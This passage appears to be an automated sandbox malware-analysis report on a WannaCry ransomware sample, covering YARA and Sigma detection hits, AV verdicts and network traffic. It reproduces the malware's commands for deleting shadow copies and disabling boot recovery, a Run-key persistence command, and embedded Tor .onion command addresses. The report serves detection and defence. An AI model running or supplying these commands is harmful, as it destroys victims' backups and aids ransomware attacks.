    • taskdl.exe (PID: 2212 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7068 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Conti, Conti LockConti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.conti
NameDescriptionAttributionBlogpost URLsLink
WannaCryptor, WannaCry, WannaCrypt
  • Lazarus Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
Click to see the 19 entries
SourceRuleDescriptionAuthorStrings
00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        0000000B.00000000.1406207775.000000000040E000.00000008.00000001.01000000.00000006.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        Process Memory Space: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID: 7412JoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          69.0.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            69.0.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
            • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
            • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
            • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
            11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
              11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0x342d41:$x2: taskdl.exe
              • 0x35962d:$x2: taskdl.exe
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0x359d91:$s2: Windows 10 -->
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x3591ff:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              Click to see the 1 entries

              Operating System Destruction

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, ParentProcessId: 2576, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 4428, ProcessName: cmd.exe

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\whprujwpxi808
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4428, ParentProcessName: cmd.exe, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 7724, ProcessName: WMIC.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\whprujwpxi808
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3408, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, ProcessId: 3636, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip, CommandLine|base64offset|contains: -j~b,, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3528, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip, ProcessId: 6256, ProcessName: chrome.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ParentProcessId: 7412, ParentProcessName: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessCommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, ProcessId: 3408, ProcessName: cmd.exe
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessId: 7412, TargetFilename: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\~SD4D61.tmp
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, ParentProcessId: 2576, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 4428, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: consent.exe 5728 686 000001FA36427DE0, ParentImage: C:\Windows\System32\consent.exe, ParentProcessId: 7456, ParentProcessName: consent.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 5728, ProcessName: svchost.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 58191711205328.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 7676, ProcessName: cscript.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ParentProcessId: 7412, ParentProcessName: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessCommandLine: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f, ProcessId: 3408, ProcessName: cmd.exe
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnkAvira: detection malicious, Label: LNK/Runner.VPDJ
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeReversingLabs: Detection: 96%
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeReversingLabs: Detection: 89%
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exeReversingLabs: Detection: 86%
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnryReversingLabs: Detection: 96%
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
              Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 96%
              Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 96%
              Source: taskhsvc.exe, 00000069.00000003.1642548432.000000000324F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_c1c9fd50-7
              Source: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipHTTP Parser: Base64 decoded: {"referrer":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0","request_id":"E234:1BCE:93535D:CF69CB:65FEEB81","visitor_id":"5835941807636015992","region_edge":"iad","region_render":"iad"}
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.16:49877 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.16:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 178.62.22.36:443 -> 192.168.2.16:49885 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.42.72.131:443 -> 192.168.2.16:49903 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SD37EB.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SD37ED.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SD37EC.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\~SD37EE.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\~SD37EF.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SD37EA.tmpJump to behavior

              Networking

              barindex
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1933086357.000000000251D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1930805946.0000000002516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1530917323.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe
              Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEApwChWQq5lNmBKsEPWGpnTgALtq6cu/9Dlxsars2jaiEPTBfZ1quoJbcAwU8Txaa8q3M1HduY4uLm+fCw8/qqsWP12ZUjUg7jK/RADXyVTCS49Jp/bOkotugNvMLEhFQWKroL6wTlvyng19/rY4p0GnonDOuwK1985i5xy4VbGZmqShzB9JWOn//Nn9jTG8fCy74/dR0vdzR9b3S6M2QnDehkJzz6WScdv103BPiylwOU0KubJRggyyddYCzzL6HvnUNKXvoIX+E4S+NgNS+6vR1WSTXxQJG89QgTb4nWlKoLIU4nqqAwUmlb93DzHEGNgbHQE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1711205520300Host: self.events.data.microsoft.comContent-Length: 8079Connection: Keep-AliveCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/light-0eace2597ca3.css HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
